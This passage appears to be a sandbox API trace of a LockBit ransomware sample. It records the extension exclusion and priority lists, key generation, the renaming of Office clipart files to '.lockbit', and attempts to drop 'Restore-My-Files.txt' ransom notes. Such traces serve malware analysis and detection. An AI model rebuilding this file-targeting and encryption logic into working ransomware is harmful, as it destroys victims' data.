returned -1 [0177.194] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.194] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.194] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.194] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.194] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.194] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.194] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.194] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.194] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.194] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.194] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.194] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.194] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.194] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.194] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.195] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.195] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.195] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.195] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.195] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.195] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.195] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.195] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.195] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.195] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02437_.WMF.lockbit") returned 72 [0177.195] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02437_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0177.196] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.196] malloc (_Size=0x40068) returned 0x3df0008 [0177.196] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1460) returned 1 [0177.196] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.197] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.197] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0177.197] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.197] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.197] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0177.197] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.202] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02437_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02437_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.202] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.202] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.203] free (_Block=0x1fa2ed8) [0177.203] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02437_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.203] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.203] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.203] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8793fa00, ftCreationTime.dwHighDateTime=0x1bd4bf3, ftLastAccessTime.dwLowDateTime=0x6d37e7b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8793fa00, ftLastWriteTime.dwHighDateTime=0x1bd4bf3, nFileSizeHigh=0x0, nFileSizeLow=0x504, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02439_.WMF", cAlternateFileName="")) returned 1 [0177.203] lstrcmpiW (lpString1=".", lpString2="SO02439_.WMF") returned -1 [0177.203] lstrcmpiW (lpString1="..", lpString2="SO02439_.WMF") returned -1 [0177.203] PathFindExtensionW (pszPath="SO02439_.WMF") returned=".WMF" [0177.203] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.204] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.205] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.205] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.206] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02439_.WMF") returned -1 [0177.206] lstrcmpiW (lpString1="ntldr", lpString2="SO02439_.WMF") returned -1 [0177.206] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02439_.WMF") returned -1 [0177.206] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02439_.WMF") returned -1 [0177.206] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02439_.WMF") returned -1 [0177.206] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02439_.WMF") returned 1 [0177.206] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02439_.WMF") returned -1 [0177.206] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.206] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02439_.WMF") returned=".WMF" [0177.206] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.206] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.206] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.206] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.206] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.206] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.206] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.206] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.206] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.206] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.206] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.206] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.206] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.206] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.207] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.207] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.207] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.207] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.207] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.207] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.207] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.207] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.207] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.207] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.207] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.207] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.207] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.207] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.207] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02439_.WMF.lockbit") returned 72 [0177.207] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02439_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.208] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.208] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.208] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1284) returned 1 [0177.209] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.209] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.209] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.210] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.210] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.217] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02439_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02439_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.217] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.217] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0177.217] free (_Block=0x1fa2ed8) [0177.217] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02439_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.217] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.217] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.218] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d37e7b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1a54, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02464_.WMF", cAlternateFileName="")) returned 1 [0177.218] lstrcmpiW (lpString1=".", lpString2="SO02464_.WMF") returned -1 [0177.218] lstrcmpiW (lpString1="..", lpString2="SO02464_.WMF") returned -1 [0177.218] PathFindExtensionW (pszPath="SO02464_.WMF") returned=".WMF" [0177.218] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.218] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.219] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.219] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02464_.WMF") returned -1 [0177.220] lstrcmpiW (lpString1="ntldr", lpString2="SO02464_.WMF") returned -1 [0177.220] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02464_.WMF") returned -1 [0177.220] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02464_.WMF") returned -1 [0177.220] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02464_.WMF") returned -1 [0177.220] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02464_.WMF") returned 1 [0177.220] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02464_.WMF") returned -1 [0177.220] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.220] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02464_.WMF") returned=".WMF" [0177.220] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.220] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.220] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.220] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.220] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.220] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.220] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.220] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.220] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.220] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.220] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.220] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.220] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.220] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.220] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.220] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.220] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.220] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.221] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.221] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.221] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.221] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.221] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.221] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.221] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.221] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.221] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.221] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.221] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02464_.WMF.lockbit") returned 72 [0177.221] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02464_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02464_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.223] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.223] malloc (_Size=0x40068) returned 0x3df0008 [0177.223] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6740) returned 1 [0177.223] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.223] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0177.223] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.224] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0177.224] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.239] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02464_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02464_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.239] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.239] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0177.239] free (_Block=0x1fa2ed8) [0177.239] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02464_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.239] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.239] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.239] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe34c8c00, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x6d37e7b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe34c8c00, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x574, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02465_.WMF", cAlternateFileName="")) returned 1 [0177.239] lstrcmpiW (lpString1=".", lpString2="SO02465_.WMF") returned -1 [0177.239] lstrcmpiW (lpString1="..", lpString2="SO02465_.WMF") returned -1 [0177.239] PathFindExtensionW (pszPath="SO02465_.WMF") returned=".WMF" [0177.239] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.239] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.239] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.239] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.239] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.239] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.239] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.239] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned 